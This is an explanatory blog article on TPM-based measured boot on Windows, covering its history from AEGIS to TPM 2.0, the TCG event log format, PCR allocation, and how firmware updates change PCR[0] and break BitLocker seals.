A boot mode in which every stage of platform initialisation hashes the next stage&apos;s code and configuration into one or more PCRs *before* transferring control. Measured Boot is *reporting*, not *enforcement* -- it records what ran, but does not refuse to run anything. Secure Boot is the enforcement counterpart that refuses unsigned code; the two cooperate. Microsoft&apos;s `Trusted Boot` [@ms-learn-boot-process] extends the measurement chain into the Windows kernel.
&lt;p&gt;By the end of this article you will be able to name every byte that went into that hash, predict whether any given administrative action will change it, and read the TCG event log on your own machine to confirm. You will see why the BitLocker seal is, in some configurations, a Faraday cage built on top of a fence the verifier never opened. You will learn that the chip Microsoft calls the &lt;em&gt;Trusted&lt;/em&gt; Platform Module knows nothing of trust -- only of arithmetic over hashes -- and that the verifier, which knows what good looks like, is always someone other than the chip.&lt;/p&gt;
&lt;p&gt;But first, the historical answer: how did a 32-byte register get into the position of deciding whether a PC boots cleanly or asks for a 48-digit key?&lt;/p&gt;
&lt;h2&gt;2. Origins: Arbaugh 1997 and the Chain-of-Hashes Axiom&lt;/h2&gt;
&lt;p&gt;The first paper to take the boot problem seriously is also one of the calmest. In 1997, three researchers at the University of Pennsylvania Distributed Systems Laboratory -- William A. Arbaugh, David J. Farber, and Jonathan M. Smith -- presented &lt;em&gt;A Secure and Reliable Bootstrap Architecture&lt;/em&gt; [@aegis-1997] at the IEEE Symposium on Security and Privacy in Oakland. They opened with a line that ages disconcertingly well: &quot;we find it surprising, given the great attention paid to operating system security that so little attention has been paid to the underpinnings required for secure operation, e.g., a secure bootstrapping phase for these operating systems.&quot;&lt;/p&gt;
&lt;p&gt;They built a working prototype. A Pentium-class PC. A modified BIOS. A small PROM expansion card with public-key certificates. And, threaded through everything, an inductive structure they called AEGIS.&lt;/p&gt;

An ordered sequence in which each stage of platform initialisation verifies the cryptographic identity of the next stage *before* it executes. If every link verifies its successor, an external observer who trusts the first link transitively trusts the chain, modulo the cryptographic strength of the verification primitive.
&lt;p&gt;AEGIS divided the boot into six levels (0 through 5). &lt;strong&gt;L0&lt;/strong&gt; was a small trusted ROM that ran the first POST phase, the signature-verification routines, and recovery code. &lt;strong&gt;L1&lt;/strong&gt; was the rest of the BIOS code plus CMOS. &lt;strong&gt;L2&lt;/strong&gt; was option-ROM expansion cards (the era&apos;s GPUs, network cards, SCSI controllers). &lt;strong&gt;L3&lt;/strong&gt; was the operating system boot block(s). &lt;strong&gt;L4&lt;/strong&gt; was the OS kernel. &lt;strong&gt;L5&lt;/strong&gt; was user programs and any network hosts the kernel reached. Each level verified the next before handing off; on a failed verification, L0 recovered the broken stage from a known-good network image. (The paper also presents a &quot;four levels of abstraction&quot; framing for one of its figures; the article uses the canonical six-level numbering.)&lt;/p&gt;

The smallest, lowest, most immutable code that runs after platform reset. It measures the next stage of firmware and extends that measurement into PCR[0] before transferring control. Modern PCs implement the CRTM in silicon -- Intel&apos;s Boot Guard Authenticated Code Module, AMD&apos;s Platform Security Processor firmware, or Microsoft&apos;s Pluton silicon -- because anything mutable is not actually a root of trust.
&lt;p&gt;The architectural axiom that survived 28 years of evolution is this: there is always a bottom layer you cannot verify yourself. AEGIS does not eliminate that layer; it reduces trust to &lt;em&gt;the smallest possible&lt;/em&gt; unverifiable thing. The L0 trusted ROM is the axiom; everything above it is provable from the axiom. Replace &quot;trusted ROM&quot; with &quot;Boot Guard ACM&quot; or &quot;PSP boot ROM&quot; or &quot;Pluton silicon firmware&quot; and the structure does not change.&lt;/p&gt;
&lt;p&gt;AEGIS could not, on its own, make the next pivot. It had no hardware-rooted endorsement key. It had no append-only register that could not be lied to. It had no remote-attestation primitive -- the L0 ROM trusted itself, but an external auditor was forced to trust the BIOS&apos;s own report of the bootstrap. The trick AEGIS could not pull off is the trick the Trusted Computing Platform Alliance was about to attempt: &lt;em&gt;make the root a chip&lt;/em&gt;.Arbaugh continued the work at the University of Maryland and later took a senior position at the National Security Agency. The bootstrap problem followed him; in 2005 he co-authored an early TPM-on-Linux survey that anticipates several of the PCR allocation conventions that PFP would formalise.&lt;/p&gt;
&lt;p&gt;The TCPA was founded on October 11, 1999 [@wiki-tcg] by Compaq, Hewlett-Packard, IBM, Intel, and Microsoft. Its first specification [@wiki-tcg] shipped January 30, 2001. The first hardware-TPM-equipped PC shipped on the IBM ThinkPad T30 in 2002 [@wiki-tcg] (with a TPM 1.1-class Infineon SLB chip); the TPM &lt;strong&gt;1.1b&lt;/strong&gt; revision deployed in volume the year after. In 2003 the TCPA was reorganised as the Trusted Computing Group, with AMD joining as a founding board member.&lt;/p&gt;
&lt;p&gt;The thing AEGIS could not do -- turn a chain of in-RAM hash comparisons into a record a remote party can trust -- is what the TPM became.&lt;/p&gt;
&lt;h2&gt;3. Early Approaches: TPM 1.1b, SHA-1, and the Original PCSI&lt;/h2&gt;
&lt;p&gt;&lt;em&gt;&quot;The first TPM version that was deployed was 1.1b in 2003&quot;&lt;/em&gt; [@wiki-tpm] -- Wikipedia, drawing on the TCPA shipment record. A 24-pin chip in a tiny LPC-bus package, soldered to the motherboard of a ThinkPad T30. Sixteen PCRs. One hash bank: SHA-1, 20 bytes wide. A monotonic counter. An endorsement key, fused at manufacture. A storage root key, generated at first ownership. By 2010, hundreds of millions of business PCs shipped with one. By July 28, 2016, Microsoft&apos;s Windows 10 hardware logo programme required TPM 2.0 on every new OEM Windows 10 PC -- desktop, mobile, and server alike [@wiki-tpm].&lt;/p&gt;
&lt;p&gt;The mechanic that did all the work is one operation: &lt;code&gt;TPM_Extend&lt;/code&gt;. It takes a PCR index and a 20-byte digest. It produces a new PCR value defined as &lt;code&gt;PCR[N] := SHA1(PCR[N] || digest)&lt;/code&gt;.&lt;/p&gt;

The only writable mutation a TPM permits on a PCR. Given the current value `P` and a new measurement `M`, the TPM computes `H(P || M)` and writes the result back into the PCR. There is no `set`; there is no `clear` (PCRs reset only at platform reset, and some PCRs not even then). The hash chain is the *only* trace.
&lt;p&gt;That two-letter primitive -- &lt;em&gt;extend&lt;/em&gt; -- is doing more cryptographic work than its size suggests. A PCR is not a set of measurements; it is a &lt;em&gt;sequence&lt;/em&gt;. If three boot stages measure three values &lt;code&gt;a&lt;/code&gt;, &lt;code&gt;b&lt;/code&gt;, &lt;code&gt;c&lt;/code&gt; into PCR[0] in that order, the resulting PCR encodes &lt;code&gt;H(H(H(0 || a) || b) || c)&lt;/code&gt;. Reorder the stages and the final hash differs. Repeat a stage and the final hash differs. &lt;em&gt;Skip&lt;/em&gt; a stage -- the move every rootkit dreams of -- and the final hash differs. Under collision-resistance of the underlying hash, producing the same final PCR via a different ordered sequence is computationally infeasible.&lt;/p&gt;

A naive design might use the PCR as a set: write each measurement into a separate slot, and let the verifier check that the set matches a known-good baseline. That design has two pathologies. First, an attacker who controls one stage can simply *not* report its measurement and let the verifier see a smaller set than ran. Second, order doesn&apos;t matter to a set; an attacker can rearrange the stages and slip a measured-but-vulnerable component in early, where its measurement still &quot;matches&quot; the baseline.&lt;p&gt;Extend solves both. You cannot omit a stage without changing the final hash. You cannot reorder. You cannot insert. The cost is that &lt;em&gt;the verifier cannot read the PCR as a list of measurements&lt;/em&gt; -- it has to be given the list (the TCG event log) separately and re-derive the final PCR by replaying the extends. This is the trade we&apos;ll meet in Section 8 as a fundamental limit.
&lt;/p&gt;&lt;p&gt;&lt;/p&gt;
&lt;p&gt;The PC Client Specific Implementation (PCSI) specification carved up the 24 PCRs of &lt;a href=&quot;https://paragmali.com/blog/the-tpm-in-windows-one-primitive-twenty-five-years-and-the-c/&quot; rel=&quot;noopener&quot;&gt;TPM 1.2&lt;/a&gt; into eight indices that the world still uses today. PCR[0] holds the CRTM, the system firmware code, and the firmware host platform extensions. PCR[1] holds the host platform configuration (CMOS settings that change platform behaviour). PCR[2] holds the option ROM code. PCR[3] holds the option ROM configuration. PCR[4] holds the master boot record code (and on UEFI machines, the boot-loader image). PCR[5] holds the master boot record partition table (and on UEFI machines, the boot configuration). PCR[6] holds host platform manufacturer-specific events. PCR[7] holds host platform manufacturer events -- a category that, post-PFP, became Secure Boot policy.&lt;/p&gt;

A group of PCRs that share a hash algorithm. TPM 1.2 had one bank only (SHA-1). TPM 2.0 supports multiple banks simultaneously -- the same PCR index exists once per bank, with one digest per bank. A measurement into PCR[7] writes the same source bytes into every bank but produces algorithm-specific digests.
&lt;p&gt;TPM 1.2 also defined the first remote-attestation primitive in industry hardware: &lt;code&gt;TPM_Quote&lt;/code&gt;. The TPM signs a snapshot of selected PCR values plus a verifier-supplied nonce with a private key the chip alone holds (the attestation identity key, signed by a TCG-managed privacy CA). The verifier checks the signature, checks the nonce, checks the AIK certificate chain, and re-derives the expected PCR set from a TCG event log delivered separately. If the re-derivation matches the signed quote, the platform&apos;s boot history is authenticated.&lt;/p&gt;
&lt;p&gt;It worked. For a while. Then, on February 23, 2017, the SHAttered team -- Marc Stevens (CWI Amsterdam) and Pierre Karpman (Inria) with Elie Bursztein, Ange Albertini, and Yarik Markov (Google Research) -- published the first public SHA-1 collision [@wiki-sha1]. Two PDF files with identical SHA-1 hashes. The collision cost about 110 GPU-years of compute [@wiki-sha1]. The implication for TPM 1.2 was immediate: a 20-byte SHA-1 PCR can no longer be assumed unique under attacker-controlled input.The SHA-1 choice in 2003 was state-of-the-art at the time, not negligence. NIST&apos;s SHA-256 had been published in 2001 but was not yet broadly trusted; SHA-1 was the IETF-blessed default for X.509 and many TLS deployments. The SHAttered collision required compute that did not exist commercially in 2003. By 2017 it required compute that anyone with a Google Cloud account could buy.&lt;/p&gt;
&lt;p&gt;If the cryptographic floor is broken and you cannot re-floor in place -- a TPM 1.2 chip cannot grow a SHA-256 bank [@wiki-tpm] -- you replace the floor with one that can be moved. That is what TPM 2.0 became.&lt;/p&gt;
&lt;h2&gt;4. Evolution: TPM 2.0, Hash Agility, and the UEFI PFP&lt;/h2&gt;
&lt;p&gt;On April 9, 2014, the Trusted Computing Group announced the TPM Library Specification 2.0 [@wiki-tpm]. ISO ratified the result the following year as ISO/IEC 11889-1:2015 [@iso-11889-1-2015], and confirmed the standard as current in a 2021 review. The change set is large -- new algorithm framework, NV index ACLs, sessions, command authorization area, ECC primary keys -- but the line that matters for measurement is the simplest one: PCRs now exist in &lt;em&gt;banks&lt;/em&gt;.&lt;/p&gt;

A property of a security system that lets operators or vendors replace one hash function with another without changing the system&apos;s interfaces. TPM 2.0 implements hash agility for PCRs (multiple banks), HMAC keys (algorithm parameter on the key), and signature primitives (algorithm parameter on the signature). Hash agility is not free: every bank costs storage, every bank costs extend cost, and the verifier must agree with the prover on which bank to use.
&lt;p&gt;A TPM 2.0 chip can run a SHA-1 bank, a SHA-256 bank, and (often) a SHA-384 bank in parallel, plus optional SHA-512 and SM3-256. The same PCR index lives once per bank. A &lt;code&gt;TPM2_PCR_Extend&lt;/code&gt; call updates every active bank with bank-specific digests; the source bytes are identical but the output is per-algorithm. &lt;code&gt;TPM2_PCR_Allocate&lt;/code&gt; reconfigures the bank set at runtime, gated by platform authorization.&lt;/p&gt;
&lt;p&gt;The event log structure had to grow with the chip. The pre-2014 log format -- &lt;code&gt;TCG_PCR_EVENT&lt;/code&gt;, single SHA-1 digest -- could not carry per-bank digests. The PC Client PFP defined a new structure, &lt;code&gt;TCG_PCR_EVENT2&lt;/code&gt;. From Microsoft&apos;s &lt;code&gt;Tbsi_Get_TCG_Log&lt;/code&gt; reference [@ms-tbs-get-tcg-log], the wire format is:&lt;/p&gt;
&lt;pre&gt;&lt;code class=&quot;language-c&quot;&gt;typedef struct {
    TCG_PCRINDEX        PCRIndex;
    TCG_EVENTTYPE       EventType;
    TPML_DIGEST_VALUES  Digests;
    UINT32              EventSize;
    UINT8               Event[EventSize];
} TCG_PCR_EVENT2;

typedef struct {
    UINT32   Count;
    TPMT_HA  Digests;  // Count copies, one per bank
} TPML_DIGEST_VALUES;

typedef struct {
    UINT16  HashAlg;
    UINT8   Digest[size_varies_with_algorithm];
} TPMT_HA;
&lt;/code&gt;&lt;/pre&gt;

An in-RAM ordered list of `TCG_PCR_EVENT2` records, populated by firmware and OS components in the exact order they extend digests into PCRs. The log is *unsigned* -- only the PCR values are signed when the verifier later requests a quote. A verifier replays the log to re-derive the PCR values and accepts the log if the re-derivation matches the signed quote.

The multi-bank digest container inside `TCG_PCR_EVENT2`. It holds a `Count` of `TPMT_HA` records, each carrying a hash-algorithm identifier (`HashAlg`, a TPM_ALG_ID) and the corresponding digest. A modern Windows log on a SHA-256-and-SHA-1 dual-bank TPM emits `Count = 2` per event with both digests of the same source bytes.
&lt;p&gt;The very first event in a TPM-2.0-format log is, deliberately, a TPM-1.2-format record. From Microsoft Learn verbatim [@ms-tbs-get-tcg-log]: &lt;em&gt;&quot;The Signature member of the TCG_EfiSpecIdEventStruct structure is set to a null-terminated ASCII string of &lt;code&gt;\&quot;Spec ID Event03\&quot;&lt;/code&gt;&quot;&lt;/em&gt;. That string is the self-describing handshake: a parser that doesn&apos;t know about banks reads the legacy event and either understands it (continuing as a 1.2 parser) or recognises the Spec ID handshake (and upgrades to the 2.0 parser). The cost of forward compatibility is precisely one event.The &quot;Event03&quot; suffix is not a typo. The TCG PC Client Platform Firmware Profile defines &lt;code&gt;TCG_EfiSpecIDEventStruct&lt;/code&gt; with &lt;code&gt;Signature[16]&lt;/code&gt; containing the ASCII string and a &lt;code&gt;specVersionMajor&lt;/code&gt;/&lt;code&gt;specVersionMinor&lt;/code&gt;/&lt;code&gt;specErrata&lt;/code&gt; triplet. The &quot;03&quot; denotes the third revision of the format. Earlier &quot;Spec ID Event02&quot; structures exist in pre-1.21 PFP firmware; they encode banks differently and are extremely rare in Windows-era machines.&lt;/p&gt;
&lt;p&gt;The bridge between the chip and the firmware is a UEFI protocol. &lt;code&gt;EFI_TCG2_PROTOCOL&lt;/code&gt; [@uefi-org-specs] (UEFI 2.5 and later) exposes three calls that matter: &lt;code&gt;HashLogExtendEvent&lt;/code&gt; (the one-shot &quot;hash this blob, log it, extend the PCR&quot; call), &lt;code&gt;GetEventLog&lt;/code&gt; (return the in-progress event log to a caller), and &lt;code&gt;GetCapability&lt;/code&gt; (which banks are active, which algorithms are supported). After &lt;code&gt;ExitBootServices&lt;/code&gt;, the firmware publishes the final log as a UEFI configuration table; the OS reads it from there.&lt;/p&gt;
&lt;p&gt;The Microsoft PFP-era PCR allocation is the table every modern Windows administrator should memorise.&lt;/p&gt;
&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;PCR&lt;/th&gt;
&lt;th&gt;TCG PFP definition&lt;/th&gt;
&lt;th&gt;Microsoft WBCL convention&lt;/th&gt;
&lt;th&gt;Linux IMA / shim convention&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;&lt;tr&gt;
&lt;td&gt;0&lt;/td&gt;
&lt;td&gt;SRTM, BIOS, host platform extensions, embedded option ROMs&lt;/td&gt;
&lt;td&gt;Firmware version (&lt;code&gt;EV_S_CRTM_VERSION&lt;/code&gt;); platform firmware blob&lt;/td&gt;
&lt;td&gt;Same&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;1&lt;/td&gt;
&lt;td&gt;Host platform configuration&lt;/td&gt;
&lt;td&gt;BIOS setup data&lt;/td&gt;
&lt;td&gt;Same&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;2&lt;/td&gt;
&lt;td&gt;UEFI driver and application code (option ROMs)&lt;/td&gt;
&lt;td&gt;Pluggable option ROM code&lt;/td&gt;
&lt;td&gt;Same&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;3&lt;/td&gt;
&lt;td&gt;UEFI driver and application configuration&lt;/td&gt;
&lt;td&gt;Option ROM data&lt;/td&gt;
&lt;td&gt;Same&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;4&lt;/td&gt;
&lt;td&gt;UEFI boot manager and boot attempts&lt;/td&gt;
&lt;td&gt;&lt;code&gt;EV_EFI_BOOT_SERVICES_APPLICATION&lt;/code&gt; for &lt;code&gt;bootmgfw.efi&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;Same (shim/grub image)&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;5&lt;/td&gt;
&lt;td&gt;Boot manager code and boot attempts&lt;/td&gt;
&lt;td&gt;Boot partition GPT, EFI variables loaded by boot manager&lt;/td&gt;
&lt;td&gt;Same&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;6&lt;/td&gt;
&lt;td&gt;Host platform manufacturer events&lt;/td&gt;
&lt;td&gt;Wake reason, S-state events&lt;/td&gt;
&lt;td&gt;Same&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;7&lt;/td&gt;
&lt;td&gt;Secure Boot policy&lt;/td&gt;
&lt;td&gt;&lt;code&gt;SecureBoot&lt;/code&gt;/&lt;code&gt;PK&lt;/code&gt;/&lt;code&gt;KEK&lt;/code&gt;/&lt;code&gt;db&lt;/code&gt;/&lt;code&gt;dbx&lt;/code&gt; variable digests&lt;/td&gt;
&lt;td&gt;Same&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;8-9&lt;/td&gt;
&lt;td&gt;OS-loader reserved&lt;/td&gt;
&lt;td&gt;Unused on Windows&lt;/td&gt;
&lt;td&gt;Linux kernel measurement (some distros)&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;10&lt;/td&gt;
&lt;td&gt;OS-loader reserved&lt;/td&gt;
&lt;td&gt;Unused on Windows&lt;/td&gt;
&lt;td&gt;IMA file measurements (canonical)&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;11&lt;/td&gt;
&lt;td&gt;OS-loader reserved&lt;/td&gt;
&lt;td&gt;Microsoft WBCL events (BitLocker control PCR)&lt;/td&gt;
&lt;td&gt;Unused&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;12&lt;/td&gt;
&lt;td&gt;OS-loader reserved&lt;/td&gt;
&lt;td&gt;Boot environment configuration&lt;/td&gt;
&lt;td&gt;Unused&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;13&lt;/td&gt;
&lt;td&gt;OS-loader reserved&lt;/td&gt;
&lt;td&gt;ELAM driver hash and policy&lt;/td&gt;
&lt;td&gt;Unused&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;14&lt;/td&gt;
&lt;td&gt;OS-loader reserved&lt;/td&gt;
&lt;td&gt;Boot-loader-authority events&lt;/td&gt;
&lt;td&gt;shim MOK certificate enrolment&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;15&lt;/td&gt;
&lt;td&gt;OS-loader reserved&lt;/td&gt;
&lt;td&gt;Reserved&lt;/td&gt;
&lt;td&gt;Reserved&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;16&lt;/td&gt;
&lt;td&gt;Debug&lt;/td&gt;
&lt;td&gt;Used during development&lt;/td&gt;
&lt;td&gt;Same&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;17-22&lt;/td&gt;
&lt;td&gt;Dynamic OS (DRTM use only)&lt;/td&gt;
&lt;td&gt;Secure Launch, Authenticated Code Module&lt;/td&gt;
&lt;td&gt;TrenchBoot, tboot&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;23&lt;/td&gt;
&lt;td&gt;Application support&lt;/td&gt;
&lt;td&gt;Reserved&lt;/td&gt;
&lt;td&gt;Reserved&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;&lt;/table&gt;
&lt;p&gt;A small word on the index column: a 24-PCR TPM ranges from PCR[0] to PCR[23].The PFP allocates PCR[16] as a debug index that platform firmware may extend during development; the value resets to zero at TPM_Init, which is one of two PCRs (the other is PCR[23]) the platform may explicitly reset. Older PCSI-era documentation sometimes refers to PCR[24]; that is a historical artifact of an unsanctioned Infineon extension and is not part of the modern PFP allocation. The allocation itself is normative in the PFP, but it sits inside a wider policy frame: NIST SP 800-155 (BIOS Integrity Measurement Guidelines, December 2011 IPD) [@csrc-sp800-155-pdf] defined the federal procurement bar for &quot;BIOS integrity measurement&quot; -- a draft that, despite never finalising, became the de-facto procurement template for the SRTM measurement chain U.S. agencies require their suppliers to ship.&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Note:&lt;/strong&gt; If you click the canonical TPM 2.0 Library Specification link [@tcg-tpm-library] or the PC Client PFP link [@tcg-pfp], the trustedcomputinggroup.org host returns HTTP 403 to non-browser User-Agents and to some browser fingerprints. The specifications exist and are normative; we cite them by canonical URL. For verbatim struct definitions and the &lt;code&gt;&quot;Spec ID Event03&quot;&lt;/code&gt; string, Microsoft&apos;s &lt;code&gt;Tbsi_Get_TCG_Log&lt;/code&gt; reference [@ms-tbs-get-tcg-log] reproduces them word-for-word; Wikipedia&apos;s TPM article [@wiki-tpm] corroborates the spec metadata.&lt;/p&gt;
&lt;/blockquote&gt;

gantt
    dateFormat YYYY
    title Five generations of measured boot
    section Generation 1
    AEGIS at UPenn (Arbaugh 1997)             :a1, 1997, 1y
    section Generation 2
    TCPA founded (1999) / TPM 1.1b (2003)     :a2, 1999, 11y
    TPM 1.2 PCSI defines PCR[0-7]             :a3, after a2, 11y
    section Generation 3
    TPM 2.0 announced (April 9, 2014)         :a4, 2014, 12y
    ISO/IEC 11889 (2015) / Hash agility       :a5, 2015, 11y
    section Generation 4
    Intel TXT GETSEC[SENTER] (2007)           :a6, 2007, 19y
    Microsoft Secure Launch (Win10 1809)      :a7, 2018, 8y
    section Generation 5
    Azure Attestation / Intune DHA            :a8, 2018, 8y
    PFP r2 / ML-DSA in flight                 :a9, 2025, 1y
&lt;p&gt;We now have a self-describing log, a hash-agile PCR set, and a verbatim ABI. Who actually writes the log? And who reads it?&lt;/p&gt;
&lt;h2&gt;5. The Breakthrough: One Log, Many Consumers&lt;/h2&gt;
&lt;p&gt;Every trust decision a modern Windows machine makes about its own boot ultimately consults the same record. BitLocker&apos;s seal release. Windows Defender System Guard runtime attestation [@ms-learn-sgsl]. Windows Hello for Business device-bound key attestation. Microsoft Azure Attestation [@ms-aa-overview] policy evaluation. Microsoft Intune Device Health Attestation. Conditional Access posture checks. All of them, ultimately, read the TCG event log -- and the PCR snapshot it replays into. One log; every feature.&lt;/p&gt;
&lt;p&gt;This is the article&apos;s structural insight. It is also the reason this specification has survived three generations of attacks: the cost of designing a new attestation feature on Windows is no longer &quot;design a new measurement plane,&quot; it is &quot;decide which PCRs your policy cares about.&quot;&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Key idea:&lt;/strong&gt; One log, many consumers. Every Windows trust decision about boot integrity -- BitLocker unseal, System Guard attestation, Hello for Business key attestation, Azure Attestation, Intune Device Health Attestation, Conditional Access -- ultimately consults the same TCG event log and the PCR snapshot it replays into. The cost of adding a new attestation feature is not a new measurement plane; it is a policy decision about which PCRs matter.&lt;/p&gt;
&lt;/blockquote&gt;

One log, every feature.
&lt;p&gt;The cooperative writers populate the log in pipeline order, following the Microsoft &lt;code&gt;Tbsi_Get_TCG_Log&lt;/code&gt; PCR allocation [@ms-tbs-get-tcg-log]. Firmware -- the silicon root of trust and everything above it through the UEFI driver execution environment -- writes PCRs 0 through 7. The Microsoft boot manager &lt;code&gt;bootmgfw.efi&lt;/code&gt; writes additional events into PCRs 4, 11, and 12. The Windows OS loader &lt;code&gt;winload.efi&lt;/code&gt; writes into PCRs 11 and 13. Into PCR 13 specifically, &lt;code&gt;winload.efi&lt;/code&gt; writes the ELAM policy hash and the ELAM driver writes its own image digest (§6.5 walks the full PCR[13] cooperative sequence). The Windows kernel emits a &lt;code&gt;EV_SEPARATOR&lt;/code&gt; event on every measured PCR once the boot-time measurement phase is complete, freezing the boot-time slice of the log for verifiers.&lt;/p&gt;
&lt;p&gt;The unified reader path mirrors the writer fan-in. &lt;code&gt;EFI_TCG2_PROTOCOL.GetEventLog&lt;/code&gt; exposes the main log to firmware drivers and applications before &lt;code&gt;ExitBootServices&lt;/code&gt;; events measured after that call are published separately through the &lt;code&gt;EFI_TCG2_FINAL_EVENTS_TABLE&lt;/code&gt; configuration table. Windows reads both during boot and exposes the merged log -- the firmware portion plus the OS-loader extensions -- to user mode through &lt;code&gt;Tbsi_Get_TCG_Log&lt;/code&gt; [@ms-tbs-get-tcg-log]. Operators read it with the inbox &lt;code&gt;tpmtool.exe&lt;/code&gt; or cross-platform &lt;code&gt;tpm2_eventlog&lt;/code&gt; [@gh-tpm2-eventlog-man]; §6.7 walks the full tool set.&lt;/p&gt;

flowchart TD
    subgraph FW[&quot;Firmware (CRTM / PEI / DXE / BDS)&quot;]
        F0[&quot;PCR[0]: CRTM, firmware blob&quot;]
        F1[&quot;PCR[1]: BIOS setup&quot;]
        F2[&quot;PCR[2]: option ROMs&quot;]
        F3[&quot;PCR[3]: option ROM config&quot;]
        F5[&quot;PCR[5]: GPT, EFI vars&quot;]
        F6[&quot;PCR[6]: wake reason&quot;]
        F7[&quot;PCR[7]: Secure Boot policy&quot;]
    end
    subgraph BM[&quot;bootmgfw.efi&quot;]
        B4[&quot;PCR[4]: boot mgr image (Authenticode)&quot;]
        B11A[&quot;PCR[11]: WBCL boot mgr events&quot;]
        B12[&quot;PCR[12]: boot config&quot;]
    end
    subgraph WL[&quot;winload.efi&quot;]
        W11[&quot;PCR[11]: kernel, HAL, boot-critical drivers&quot;]
        W13A[&quot;PCR[13]: ELAM policy hash&quot;]
    end
    subgraph ELAM[&quot;ELAM driver&quot;]
        E13[&quot;PCR[13]: ELAM driver hash&quot;]
    end
    subgraph K[&quot;Windows kernel&quot;]
        SEP[&quot;EV_SEPARATOR on every measured PCR (freeze)&quot;]
    end
    FW --&amp;gt; BM --&amp;gt; WL --&amp;gt; ELAM --&amp;gt; K
&lt;p&gt;A single canonical log eliminates per-feature reinvention. Azure Attestation does not have to parse a different log than BitLocker. Hello for Business does not have to extend its own PCRs. The verifier community -- the part that knows what &quot;good&quot; means -- builds policies on top of one shared substrate.&lt;/p&gt;
&lt;p&gt;We have named the log abstractly. What does an actual event look like, byte by byte, on the wire?&lt;/p&gt;
&lt;h2&gt;6. State of the Art: A Line-by-Line Walk Through the SRTM Chain&lt;/h2&gt;
&lt;p&gt;This is the section the practitioner audience came for. We walk the chain in the exact order events are logged on a modern UEFI Windows 11 24H2 machine. Reference: a Dell OptiPlex 7090 with Boot Guard, TPM 2.0 in SHA-256-only mode, Secure Boot enabled, BitLocker with TPM-only protector bound to the PFP-default UEFI profile.&lt;/p&gt;
&lt;p&gt;The first &lt;em&gt;measured&lt;/em&gt; event, after the initial &lt;code&gt;EV_NO_ACTION&lt;/code&gt; Spec ID record described above, is a &lt;code&gt;EV_S_CRTM_VERSION&lt;/code&gt; record. PCR index 0. Event type &lt;code&gt;0x00000008&lt;/code&gt;. Two SHA-256 digests (one per active bank if SHA-1 is also enabled). Event size 8. Event data: a little-endian UTF-16 string containing the firmware version, padded to 8 bytes. The CRTM extends &lt;em&gt;its own&lt;/em&gt; version into PCR[0] before measuring anything else. This is the foundation event.&lt;/p&gt;
&lt;h3&gt;6.1 The CRTM and PCR[0]&lt;/h3&gt;
&lt;p&gt;The very first instruction the CPU fetches after reset is not in DRAM. On a modern x86, it is in an immutable silicon region whose location and contents differ by silicon vendor.&lt;/p&gt;
&lt;p&gt;On AMD Zen-class platforms, the Platform Security Processor -- a 32-bit ARM core inside the SOC -- boots first, validates the platform firmware against a key fused into silicon, and only then releases the x86 cores from reset. On Intel platforms with Boot Guard, the Authenticated Code Module is loaded from firmware into the cache-as-RAM region, signed by a key whose hash is fused into Intel chipset OTP fuses, and verified by microcode before x86 main core start. On Microsoft Pluton SKUs, the &lt;a href=&quot;https://paragmali.com/blog/pluton-a-tpm-on-silicon-microsoft-can-patch/&quot; rel=&quot;noopener&quot;&gt;Pluton silicon firmware&lt;/a&gt; runs first; on AMD Ryzen 6000-series and later parts with Pluton enabled, Pluton is implemented as a Microsoft-co-designed firmware mode running on the existing AMD PSP coprocessor, not as a separate chip.&lt;/p&gt;
&lt;p&gt;In every case, that silicon-rooted CRTM measures the next stage of firmware before transferring control. From Microsoft&apos;s hardware-rooted trust documentation [@ms-learn-hwrot], verbatim: &lt;em&gt;&quot;This technique of measuring the static early boot UEFI components is called the Static Root of Trust for Measurement (SRTM).&quot;&lt;/em&gt; The SRTM extends PCR[0] with a chain of three early events: &lt;code&gt;EV_S_CRTM_VERSION&lt;/code&gt; (firmware version), &lt;code&gt;EV_S_CRTM_CONTENTS&lt;/code&gt; (the immutable CRTM code hash), and &lt;code&gt;EV_POST_CODE&lt;/code&gt; (the POST code region hash). Then, if the platform has a separable firmware volume, an &lt;code&gt;EV_EFI_PLATFORM_FIRMWARE_BLOB&lt;/code&gt; event covers the rest of the SPI flash region per the TCG PFP event-type registry surfaced in Microsoft&apos;s &lt;code&gt;Tbsi_Get_TCG_Log&lt;/code&gt; reference [@ms-tbs-get-tcg-log]. The PFP closes PCR[0] with an &lt;code&gt;EV_SEPARATOR&lt;/code&gt; event at the BDS boundary.&lt;/p&gt;
&lt;p&gt;Where the firmware-version string differs, the SHA-256 digest of the &lt;code&gt;EV_S_CRTM_VERSION&lt;/code&gt; event data differs. Where the &lt;code&gt;EV_S_CRTM_VERSION&lt;/code&gt; digest differs, PCR[0] differs. That is the entire mechanism by which an overnight UEFI patch changes PCR[0]. Dell updated the firmware string from &quot;1.16.0&quot; to &quot;1.17.0&quot;; the bytes hashed; the PCR moved; the seal broke.&lt;/p&gt;
